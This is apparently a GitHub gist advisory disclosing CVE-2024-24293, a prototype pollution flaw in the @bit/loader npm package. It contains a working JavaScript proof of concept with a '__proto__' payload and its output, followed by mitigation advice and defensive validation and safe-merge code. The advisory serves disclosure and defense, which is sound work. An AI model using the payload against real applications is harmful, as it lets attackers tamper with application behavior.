@tariqhawis
Last active May 18, 2024 03:40
(CVE-2024-24293) Prototype Pollution Affecting @bit/loader npm package

Overview

Affected versions of this package are vulnerable to Prototype Pollution because the merge is invoked unsafely in the M function. The tainted e argument, which carries a __proto__ object, is never checked for whether it resolves to the object prototype, so when the merge operation copies it into the empty target object the malicious property lands on Object.prototype and from there recursively affects every object in the program.

PoC

(async () => {
  const lib = await import('@bit/loader');

  // JSON.parse creates "__proto__" as an own property; the unsafe merge later copies it onto Object.prototype.
  var BAD_JSON = JSON.parse('{"__proto__":{"polluted":true}}');
  var victim = {};
  console.log("Before Attack: ", JSON.stringify(victim.__proto__));
  try {
    lib.default(BAD_JSON);
  } catch (e) { }
  console.log("After Attack: ", JSON.stringify(victim.__proto__));
  // Clean up so the polluted property does not leak into later code.
  delete Object.prototype.polluted;
})();

Output:

Before Attack:  {}
After Attack:  {"polluted":true}

Output of a successful fix:

Before Attack:  {}
After Attack:  {}

How to prevent:

This package has no security update for the vulnerability described above; therefore, users should ensure proper sanitization and validation of user-supplied inputs, blocking any input containing __proto__ or constructor.prototype keys.
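The following is an added example of the input-side mitigation described above; it is not code from this advisory or from the @bit/loader package. The function names findPollutingKey, parseUntrustedJson and safeMerge are assumed, and the guard covers __proto__ anywhere in the input and constructor.prototype, which are the two paths named above.

```javascript
// Added example, not code from the advisory or from @bit/loader.

// Returns the path of the first key that could reach Object.prototype
// (__proto__ anywhere, or constructor.prototype), or null if none is found.
// Arrays are walked too: their keys are indices, so only their elements matter.
function findPollutingKey(value, path = '$') {
  if (value === null || typeof value !== 'object') return null;
  // Object.keys lists "__proto__" here because JSON.parse creates it as an
  // own property rather than setting the prototype.
  for (const key of Object.keys(value)) {
    const child = value[key];
    if (key === '__proto__') return `${path}.__proto__`;
    if (key === 'constructor' && child !== null && typeof child === 'object' &&
        Object.prototype.hasOwnProperty.call(child, 'prototype')) {
      return `${path}.constructor.prototype`;
    }
    const hit = findPollutingKey(child, `${path}.${key}`);
    if (hit) return hit;
  }
  return null;
}

// Parse untrusted JSON text and refuse it if it would pollute the prototype.
function parseUntrustedJson(text) {
  const parsed = JSON.parse(text);
  const hit = findPollutingKey(parsed);
  if (hit) throw new Error(`Rejected prototype-polluting key at ${hit}`);
  return parsed;
}

// Deep merge that skips prototype-reaching keys and only ever writes own
// properties of the target, so a polluted source cannot reach Object.prototype.
function safeMerge(target, source) {
  for (const key of Object.keys(source)) {
    if (key === '__proto__' || key === 'constructor') continue;
    const value = source[key];
    if (value !== null && typeof value === 'object' && !Array.isArray(value)) {
      if (!Object.prototype.hasOwnProperty.call(target, key) ||
          target[key] === null || typeof target[key] !== 'object') {
        target[key] = {};
      }
      safeMerge(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}
```

Running the advisory's payload through parseUntrustedJson raises an error instead of reaching a merge, and safeMerge leaves Object.prototype untouched even when handed the raw payload.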


Update: Disclosed publicly following four months of no response from the maintainer.
